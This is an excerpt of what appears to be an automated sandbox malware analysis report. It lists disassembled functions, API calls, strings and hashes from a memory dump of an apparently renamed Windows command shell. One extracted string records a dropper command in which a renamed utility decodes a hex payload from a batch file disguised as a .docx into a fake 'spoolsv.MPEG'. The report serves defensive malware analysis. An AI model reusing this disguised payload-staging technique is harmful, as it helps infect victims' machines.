                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: exit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2483651598-0
                                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                          • Instruction ID: 711d67c70c35918abe37e95caa9d627fb629a1a11bf3a36ef0c6da3b14c018d3
                                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                          • Instruction Fuzzy Hash: 78C0803070564687EF5D7735B49107DD5546F08305F49543CC50B812B1FE2CD40C8210
                                                                                                          Function 00007FF7AB135508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DefaultUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358694519-0
                                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                          • Instruction ID: 1ecfa4c4f8078bdcf456729ab60d1787b048c8a134dfa46937d2af47e7b89959
                                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                          • Instruction Fuzzy Hash: 4FE0C2F2E0A2538AF5DE3A49F0893B89953DB6AF8AFC64031C60D122F16D2D38455228
                                                                                                          Function 00007FF7AB132E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction ID: 795868105bf6d58b7335481bda7b5d96b348a82e119f48b0c6f2684bb872796d
                                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction Fuzzy Hash: 54F0B421B0A78140EA99A75AF541129A2909B88BE4B888330EA7D47BF9EE3CD4518700

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FF7AB12372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                          • String ID: COPYCMD$\
                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction ID: 9bd5bc5a62acdcbfd3d05b01c39a3a0677e118c48fe3fffa944f31d8a774b1f1
                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction Fuzzy Hash: C5F1D365A0A786C5EA56BB19F4402BAE7A0FF45B8CF968135CA4E077B4EE3CE445C310
                                                                                                          Function 00007FF7AB12B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction ID: fa0974ff6e9740c27ee19cfe37be822cb5305316cab778d46c36d4976ae5e575
                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction Fuzzy Hash: 94D18222A0A642C6EB56BB2DF4401BEA2A1FF44B5CF864235D91D477F4DF3CE8468760
                                                                                                          Function 00007FF7AB14AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                          • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                          • Instruction ID: f1f25ab05c201e3b50fcbd3885ddd4e56566b1169fc898eb6111074bd6a213a3
                                                                                                          • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                          • Instruction Fuzzy Hash: 4271C7B1B1AB8286EB526B1DF0502BAE2A1FF45758FC64131DA4E477B4EF3CD5818720
                                                                                                          Function 00007FF7AB121884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                          • String ID: COPYCMD
                                                                                                          • API String ID: 2429825313-3727491224
                                                                                                          • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                          • Instruction ID: a85cece1efcf5e2a32b95e9e21596af4d73a9e53a6d7c569c0f26679065baa2a
                                                                                                          • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                          • Instruction Fuzzy Hash: 3FF1B472F0A642C5FB62EF59F0442BDA2B1AB0479CF864235CE5D136B4EE3CA551D360
                                                                                                          Function 00007FF7AB14BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3476366620-0
                                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                          • Instruction ID: 7e07dabb1ab63d06820df1fed5267e62a251eb80e05138a27e63b176ba721d33
                                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                          • Instruction Fuzzy Hash: 7F21716090BA4386EA167B2CF8952B9FA50FF4971DFC64275C41F432F1EF3DA4088620
                                                                                                          Function 00007FF7AB129B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction ID: b6c74b2d07e88b0715cad910373ad56d90adff6bfe7daaebf43208927358bc43
                                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction Fuzzy Hash: 72A1E521A1A646C5EB56BB1DF45167AA6A1FF88788FC24135DD4E837B4EF3CE401C320
                                                                                                          Function 00007FF7AB12F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7AB12F52A,00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F8DE
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F8FB
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F951
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F96B
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FA8E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12FB14
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FB2D
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FBEA
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12F996
                                                                                                            • Part of subcall function 00007FF7AB130010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                            • Part of subcall function 00007FF7AB130010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                            • Part of subcall function 00007FF7AB130010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                            • Part of subcall function 00007FF7AB130010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                            • Part of subcall function 00007FF7AB130010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D401
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D41B
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D435
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D480
                                                                                                          Strings
                                                                                                          • =,;, xrefs: 00007FF7AB12F8C8
                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF7AB12F90E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                          • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 3964947564-2064621987
                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction ID: 01f0b7dc2bddbf7a9127ce499b9c4e6f806935b85e3d70ea7b135fd0036b164c
                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction Fuzzy Hash: 66026A21A0B602C6EB5ABB29F854278E7A0FF4975CFD24635D90E432B4EF3DA414C661
                                                                                                          Function 00007FF7AB13081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                          • API String ID: 198002717-267741548
                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction ID: 0c8f972cece2aa3c170077d63e7f45d57bc5834901acecf6befa7d7d5e343c88
                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction Fuzzy Hash: 1A514F21A0A64286F6556B1DF854279FA90BF49B88FD69175C94E03678EF3CE0488360
                                                                                                          Function 00007FF7AB12EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction ID: 1870dbb0b25e24ca83d9c094d5b22b03a32a59e301fa8cb2419b7669c19a9978
                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction Fuzzy Hash: DB22A665E0A656C1FA667B1DF45027AE7A0BF05B9CFC24232D98D422F4DF3CA4418BB1
                                                                                                          Function 00007FF7AB132B94 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
